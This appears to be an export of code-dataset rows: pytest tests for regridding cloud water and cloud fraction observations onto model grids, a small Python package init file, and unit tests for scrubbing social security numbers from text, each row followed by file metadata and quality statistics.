[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_rain']
testing.assert_almost_equal(round(x[0, 0], 3), 2.143)
def test_regrid_iwc_rain_all_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 3, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
obj._obs_data[:, :] = ma.masked
dict = {'iwc_rain': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_rain']
testing.assert_equal(x[0, 0], np.nan)
def test_regrid_product(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 1, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
dict = {'lwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_product(dict, 0, 0, ind)
x = dict['lwc']
testing.assert_almost_equal(x[0, 0], 1.4)
def test_regrid_product_nan(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, np.nan, 1, 1],
[np.nan, 1, 2, 2],
[3, 3, np.nan, 3],
[4, np.nan, 4, 4]])
dict = {'lwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_product(dict, 0, 0, ind)
x = dict['lwc']
testing.assert_almost_equal(x[0, 0], 1.5)
def test_regrid_product_all_nan(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan]])
dict = {'lwc': np.zeros((1, 1))}
ind = np.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_product(dict, 0, 0, ind)
x = dict['lwc']
testing.assert_almost_equal(x[0, 0], np.nan)
def test_regrid_product_masked(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 1, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
obj._obs_data[2, :] = ma.masked
dict = {'lwc': np.zeros((1, 1))}
ind = np.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_product(dict, 0, 0, ind)
x = dict['lwc']
testing.assert_almost_equal(x[0, 0], 1.4)
def test_regrid_product_all_masked(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 1, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
obj._obs_data[:, :] = ma.masked
dict = {'lwc': np.zeros((1, 1))}
ind = np.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_product(dict, 0, 0, ind)
x = dict['lwc']
testing.assert_almost_equal(x, np.nan)
def test_regrid_product_none(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 1, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
dict = {'lwc': np.zeros((1, 1))}
ind = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_product(dict, 0, 0, ind)
compare = np.nanmean(obj._obs_data[ind])
x = dict['lwc']
testing.assert_almost_equal(x[0, 0], np.nan)
@pytest.mark.parametrize("product", [
"cf_A", "cf_V", "cf_A_adv", "cf_V_adv"])
def test_append_data2object_cf(product, model_file, obs_file):
obs = ObservationManager('cf', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'cf')
ProductGrid(model, obs)
assert product + '_' + MODEL in model.data.keys()
@pytest.mark.parametrize("product", [
"iwc", "iwc_att", "iwc_rain",
"iwc_adv", "iwc_att_adv", "iwc_rain_adv"])
def test_append_data2object_iwc(product, model_file, obs_file):
obs = ObservationManager('iwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'iwc')
ProductGrid(model, obs)
assert product + '_' + MODEL in model.data.keys()
@pytest.mark.parametrize("product", [
"lwc", "lwc_adv"])
def test_append_data2object_lwc(product, model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
ProductGrid(model, obs)
assert product + '_' + MODEL in model.data.keys()
| 39.543092
| 79
| 0.517782
| 4,184
| 28,906
| 3.397467
| 0.027247
| 0.043757
| 0.035667
| 0.037144
| 0.94351
| 0.923602
| 0.903482
| 0.890749
| 0.890327
| 0.881815
| 0
| 0.065386
| 0.315886
| 28,906
| 730
| 80
| 39.59726
| 0.653451
| 0
| 0
| 0.812598
| 0
| 0
| 0.028645
| 0
| 0
| 0
| 0
| 0
| 0.074016
| 1
| 0.074016
| false
| 0
| 0.011024
| 0
| 0.085039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2cfd9f3bcd6b6e8a37b69acc0c2fa9bc784ea45
| 167
|
py
|
Python
|
deepr/examples/multiply/layers/__init__.py
|
drohde/deepr
|
672772ea3ce9cf391f9f8efc7ae9c9d438957817
|
[
"Apache-2.0"
] | 50
|
2020-05-19T17:29:44.000Z
|
2022-01-15T20:50:50.000Z
|
deepr/examples/multiply/layers/__init__.py
|
drohde/deepr
|
672772ea3ce9cf391f9f8efc7ae9c9d438957817
|
[
"Apache-2.0"
] | 75
|
2020-05-20T16:53:37.000Z
|
2022-01-12T15:53:46.000Z
|
deepr/examples/multiply/layers/__init__.py
|
drohde/deepr
|
672772ea3ce9cf391f9f8efc7ae9c9d438957817
|
[
"Apache-2.0"
] | 17
|
2020-05-25T13:23:03.000Z
|
2022-02-21T11:22:08.000Z
|
# pylint: disable=unused-import,missing-docstring
from deepr.examples.multiply.layers.loss import SquaredL2
from deepr.examples.multiply.layers.model import Multiply
| 33.4
| 57
| 0.844311
| 22
| 167
| 6.409091
| 0.636364
| 0.12766
| 0.241135
| 0.35461
| 0.439716
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.071856
| 167
| 4
| 58
| 41.75
| 0.903226
| 0.281437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b2d5e4745e13ad509acdafd167e4e0733a37cbb8
| 1,254
|
py
|
Python
|
tests/test_ssn.py
|
seattleopendata/scrubadub
|
00522458640d1ba6eddf5b2772ebd0bbf62cb4e2
|
[
"MIT"
] | 3
|
2019-04-14T04:13:40.000Z
|
2020-04-22T05:10:28.000Z
|
tests/test_ssn.py
|
seattleopendata/scrubadub
|
00522458640d1ba6eddf5b2772ebd0bbf62cb4e2
|
[
"MIT"
] | null | null | null |
tests/test_ssn.py
|
seattleopendata/scrubadub
|
00522458640d1ba6eddf5b2772ebd0bbf62cb4e2
|
[
"MIT"
] | 3
|
2020-04-18T15:25:33.000Z
|
2021-06-12T02:58:01.000Z
|
import unittest
from base import BaseTestCase
class SSNTestCase(unittest.TestCase, BaseTestCase):
def test_clean_hyphens(self):
"""
BEFORE: My social security number is 812-80-1276
AFTER: My social security number is {{SSN}}
"""
self.compare_clean_before_after()
def test_clean_dots(self):
"""
BEFORE: My social security number is 812.80.1276
AFTER: My social security number is {{SSN}}
"""
self.compare_clean_before_after()
def test_clean_spaces(self):
"""
BEFORE: My social security number is 812 80 1276
AFTER: My social security number is {{SSN}}
"""
self.compare_clean_before_after()
def test_scan_hyphens(self):
"""
BEFORE: My social security number is 812-80-1276
AFTER: ssn
"""
self.compare_scan_before_after()
def test_scan_dots(self):
"""
BEFORE: My social security number is 812.80.1276
AFTER: ssn
"""
self.compare_scan_before_after()
def test_scan_spaces(self):
"""
BEFORE: My social security number is 812 80 1276
AFTER: ssn
"""
self.compare_scan_before_after()
| 25.591837
| 56
| 0.601276
| 152
| 1,254
| 4.763158
| 0.184211
| 0.099448
| 0.198895
| 0.273481
| 0.867403
| 0.861878
| 0.861878
| 0.861878
| 0.861878
| 0.861878
| 0
| 0.062572
| 0.311802
| 1,254
| 48
| 57
| 26.125
| 0.776362
| 0.370016
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.133333
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.